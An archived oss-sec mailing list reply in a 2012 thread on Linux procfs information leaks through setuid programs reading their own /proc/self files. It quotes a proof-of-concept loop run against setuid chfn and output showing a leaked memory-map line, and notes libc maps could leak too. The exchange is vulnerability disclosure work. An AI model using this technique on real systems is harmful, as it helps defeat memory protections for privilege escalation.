oss-sec mailing list archives
Re: Linux procfs infoleaks via self-read by a SUID/SGID program (was: CVE-2011-3637 Linux kernel: proc: fix Oops on invalid /proc/<pid>/maps access)
From: "Jason A. Donenfeld" <Jason () zx2c4 com>
Date: Thu, 9 Feb 2012 03:28:16 +0100
On Thu, Feb 9, 2012 at 00:03, Djalal Harouni <tixxdz () opendz org> wrote:
BTW lseek() on seq files will only succeed on /proc/self/ files. chsh which is a setuid on most of the distros will read stdin and print errors to stderr, this is why it can be used as a target program, I did not search but if there is another program then it may be our 'winner'.
This issue is actually somewhat similar to the /proc/pid/mem issue a few weeks ago. Seems like Linus' logic from this commit [1] should be applied to the rest of proc.
$ for i in $(seq 460 480); \
do ./procfs_leak_2 /usr/bin/chfn /proc/self/smaps $i; done
Password: chfn: PAM authentication failed
Password: chfn: PAM authentication failed
Password: chfn: PAM authentication failed
Password: chfn: PAM authentication failed
Password: chfn: PAM authentication failed
Password: chfn: PAM authentication failed
Password: chfn: PAM authentication failed
Password: chfn: PAM authentication failed
Password: Changing the user information for tixxdz
Enter the new value, or press ENTER for the default
Full Name: tixxdz
Room Number [er]: Work Phone []: Home Phone []:
chfn: invalid room number: '00608000-0060a000 rw-p
00008000 08:01 218841
/usr/bin/chfn'
Password: chfn: PAM authentication failed
Password: chfn: PAM authentication failed
This was tested on Ubuntu, Debian default setuid 'chfn'.
Awesome! Nice work.
You can do this to leak maps of libc... since the lseek() on /proc/self will pass the ptrace_may_access() check.
Solar as I've said above I believe that there is a compilcated problem about these files, should I discuss them here or just finish my patches and try to discuss them on lkml ?
Let me know if you move it to LKML -- I'm curious to see how this pans out.
Thanks.Alexander
[1] http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=e268337dfe26dfc7efd422a804dbb27977a3cccc
Current thread:
- CVE-2011-3637 Linux kernel: proc: fix Oops on invalid /proc/<pid>/maps access Solar Designer (Feb 05)
- Re: CVE-2011-3637 Linux kernel: proc: fix Oops on invalid /proc/<pid>/maps access Jason A. Donenfeld (Feb 07)
- Linux procfs infoleaks via self-read by a SUID/SGID program (was: CVE-2011-3637 Linux kernel: proc: fix Oops on invalid /proc/<pid>/maps access) Solar Designer (Feb 08)
- Re: Linux procfs infoleaks via self-read by a SUID/SGID program (was: CVE-2011-3637 Linux kernel: proc: fix Oops on invalid /proc/<pid>/maps access) Djalal Harouni (Feb 08)
- Re: Linux procfs infoleaks via self-read by a SUID/SGID program (was: CVE-2011-3637 Linux kernel: proc: fix Oops on invalid /proc/<pid>/maps access) Jason A. Donenfeld (Feb 08)
- Re: Linux procfs infoleaks via self-read by a SUID/SGID program (was: CVE-2011-3637 Linux kernel: proc: fix Oops on invalid /proc/<pid>/maps access) Jason A. Donenfeld (Feb 08)
- Re: Linux procfs infoleaks via self-read by a SUID/SGID program (was: CVE-2011-3637 Linux kernel: proc: fix Oops on invalid /proc/<pid>/maps access) Solar Designer (Feb 08)
- Re: Linux procfs infoleaks via self-read by a SUID/SGID program (was: CVE-2011-3637 Linux kernel: proc: fix Oops on invalid /proc/<pid>/maps access) Jason A. Donenfeld (Feb 08)
- Re: Linux procfs infoleaks via self-read by a SUID/SGID program (was: CVE-2011-3637 Linux kernel: proc: fix Oops on invalid /proc/<pid>/maps access) Solar Designer (Feb 08)
- Re: Linux procfs infoleaks via self-read by a SUID/SGID program (was: CVE-2011-3637 Linux kernel: proc: fix Oops on invalid /proc/<pid>/maps access) Djalal Harouni (Feb 09)
- Linux procfs infoleaks via self-read by a SUID/SGID program (was: CVE-2011-3637 Linux kernel: proc: fix Oops on invalid /proc/<pid>/maps access) Solar Designer (Feb 08)
- Re: CVE-2011-3637 Linux kernel: proc: fix Oops on invalid /proc/<pid>/maps access Jason A. Donenfeld (Feb 07)